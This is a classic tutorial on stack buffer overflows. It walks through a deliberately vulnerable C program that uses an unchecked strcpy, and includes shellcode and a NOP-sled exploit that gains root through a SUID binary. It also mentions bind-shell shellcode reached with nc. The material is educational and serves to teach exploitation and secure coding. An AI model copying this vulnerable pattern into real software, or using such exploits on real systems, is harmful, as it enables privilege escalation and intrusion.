** UGLY DISCLAIMER BEGIN **
As always with texts describing security-related issues, this text is for information only. I am not responsible for anything illegal done with it. I have done what I could to make it less script-kiddie friendly, though.
** UGLY DISCLAIMER END **
As you probably know, what a buffer overflow tries to do is simply to
write beyond a buffer on the stack so when the function returns it will
jump to some code that most often starts a shell instead of returning
to the function that called the current function.
To understand how it works you have to know how the stack works and
how functions are called in C.
The stack starts somewhere in the top of memory and the stack pointer
moves down as we push things on the stack and back up as we pop it off
again.
If we have a simple C function like:
% cat test.c
void myfunction(int a,int b)
{
    int c = a+b;
}
gcc -S test.c gives the following assembly code for this function:
Line | Instruction            | Description
-----+------------------------+----------------------------------------------------
1    | myfunction:            |
2    | pushl %ebp             | save the value of ebp on the stack
3    | movl %esp,%ebp         | copy the stack pointer to ebp
4    | subl $24,%esp          | make room for 24 bytes (only 4 needed)
5    | movl 8(%ebp),%eax      | read a
6    | movl 12(%ebp),%edx     | read b
7    | leal (%edx,%eax),%ecx  | fancy way of doing ecx = edx + eax
8    | leave                  | short way of doing the opposite of lines 2 and 3
9    | ret                    | pop the return address off the stack and jump to it
In C, functions are called as follows:
- The caller pushes the parameters on the stack from right to left. So in this case b is pushed on the stack first and then a.
- The caller then executes a call instruction, which pushes the address of the next instruction onto the stack and jumps to myfunction.
- The called function normally creates a stack frame using ebp (this is done so you can address the parameters using constant offsets no matter how much you push and pop) - this is what we see in lines 2, 3 and 8.
- Room is made for the local variables (in this case c). For some reason gcc reserves 20 bytes extra in this case.
- a and b are read, added and written to c.
- The stack is cleaned up and execution returns to the address that the call instruction pushed on the stack.
So in this case the stack looks like this inside myfunction:
b                    (highest address, pushed first)
a
<return address>
<ebp>
c                    (lowest address)
What we want to do is to change the return address. This is not
possible in this case, because no matter what a and b are, the
result cannot overflow c into ebp and the return address. But if c were
a character buffer instead, we could write past it:
A little example:
% cat overflow.c
#include <stdio.h>
#include <string.h>
void copy_string(char *s)
{
    char local[1024];
    /* strcpy does not check that s fits in local */
    strcpy(local,s);
    printf("string is %s\n",local);
}
int main(int argc, char *argv[])
{
    copy_string(argv[1]);
    return 0;
}
So we have a function copy_string which makes a copy of the first
command line parameter of the program into a buffer of a fixed size
and then prints it out. This might look stupid but something like this
is quite common for programs that need to open files given on the
command line and such things.
If we compile and run it:
% gcc -o overflow overflow.c
% ./overflow 'Hello world!'
string is Hello world!
So everything is fine, right? Let's see what happens when we call it
with a parameter longer than 1024 characters:
% ./overflow `perl -e 'print "a" x 2000'`
string is aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
zsh: segmentation fault (core dumped) ./overflow `perl -e 'print "a" x 2000'`
If you're not familiar with Perl, the little script above generates
a string of 2000 a's.
You might have turned off generation of core files in your shell - if
so, run ulimit -c 100000 before running the program to enable it.
If we run our core file through gdb we get:
% gdb ./overflow core
GNU gdb 2002-04-01-cvs
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux".
Core was generated by `aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x61616161 in ?? ()
So we got a segmentation fault at address 0x61616161 - which is the
string 'aaaa' in hexadecimal.
Now we know that we can get the program to jump to an arbitrary
address depending on what we give it as parameter. What we would
really like to do is to make it jump to the beginning of our buffer
(local) which is placed on the stack - but what is the address of the
stack right now? Gdb can tell us that:
(gdb) info register esp
esp 0xbffff334 0xbffff334
This is all we need to know to get our code executed.
Now we need some code to get executed. The most common code is code
which does an execve (see man 2 execve) on /bin/sh (so-called
shellcode). This is fairly easy to program if you know assembly
programming, but there are a few things that you have to take into
consideration:
- The code should be as short as possible as it has to fit in the buffer.
- Some programs check the string for various values, so there are certain byte values that shouldn't be used. An example of this can be seen in our copy_string function, where we use strcpy to copy the parameter to local. strcpy copies bytes from input to output until it finds a byte with the value 0, so if our shellcode contained a 0 the copy would stop there and our exploit wouldn't work.
- It must be able to run independently of what address it is loaded from, so it should use no absolute addresses (or we would have to change it for every program we wanted to exploit).
I'm not going to go into writing a piece of shellcode (a Google search
for shellcode should give you plenty) - so I'm just going to use a
ready-made one for linux/i386. Represented as a string it could look
like this (this one runs /bin/id rather than /bin/sh):
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff/bin/id";
First we make sure it actually works by calling it directly:
% cat exploit1.c
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff/bin/id";
int main()
{
    void (*code)() = (void (*)())shellcode;
    code();
    return 0;
}
% gcc -o exploit1 exploit1.c
% ./exploit1
uid=1000(jacmet) gid=1000(jacmet) groups=1000(jacmet),20(dialout),24(cdrom),29(audio),30(dip),44(video),102(plex86)
Good, so it works. Now we just need to put it into the parameter for
the program. That is most easily done through a little C program.
% cat exploit2.c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff/bin/id";
#define NOP 0x90
#define LEN (1024+8)
#define RET 0xbffff334
int main()
{
    char buffer[LEN+1]; int i;
    /* first fill up the buffer with NOPs */
    for (i=0;i<LEN;i++)
        buffer[i] = NOP;
    /* and then the shellcode */
    memcpy(&buffer[LEN-strlen(shellcode)-4],shellcode,strlen(shellcode));
    /* and finally the address to return to */
    *(int*)(&buffer[LEN-4]) = RET;
    /* terminate the string so it can be passed as an argument */
    buffer[LEN] = 0;
    /* run program with buffer as parameter */
    execlp("./overflow","./overflow",buffer,NULL);
    return 0;
}
We start with a buffer which is the size of the local variable (1024
bytes) + 8 bytes for ebp and the return address.
As the buffer is longer than our shellcode we fill up the beginning of
it with the do-nothing machine code (NOP), copy in the shellcode and
finally the address of the beginning of the buffer.
If we try to run it then we get:
% gcc -o exploit2 exploit2.c
% ./exploit2
string is <lots of garbage>
uid=1000(jacmet) gid=1000(jacmet) groups=1000(jacmet),20(dialout),24(cdrom),29(audio),30(dip),44(video),102(plex86)
Ok, so we did it. This is of course not much fun as our overflow program
runs as my own user, but if it were a SUID root program then our code
would now be running as root.
We can easily try it out:
% chmod +s overflow
% sudo chown root overflow
% ./exploit2
uid=1000(jacmet) gid=1000(jacmet) euid=0(root) groups=1000(jacmet),20(dialout),24(cdrom),29(audio),30(dip),44(video),102(plex86)
And our code runs with root privileges (note euid=0).
More advanced shellcode creates a listening socket and redirects
stdin/stdout to it before calling execve on /bin/sh - that way you don't
need a shell account on the machine and can simply point telnet or nc
at the machine/port to get a root shell.
This is basically it - if you have any questions regarding this article
feel free to send me an email.
A few links:
Security under Linux : the Buffer Overflow Problem:
http://www-miaif.lip6.fr/willy/security/linux.html
Win32 Buffer Overflows (Location, Exploitation and Prevention):
http://phrack.org/phrack/55/P55-15
http://www.phrack.org in general contains lots of
interesting technical information about computer security.
David A. Wheeler's Secure Programming for Linux and Unix HOWTO:
http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/index.html
Writing Buffer Overflow Exploits (the shellcode was taken from here):
http://packetstorm.linuxsecurity.com/mag/hackersdigest/digest_s_1.txt
Linux Assembly: (general assembly information)
http://www.linuxassembly.org/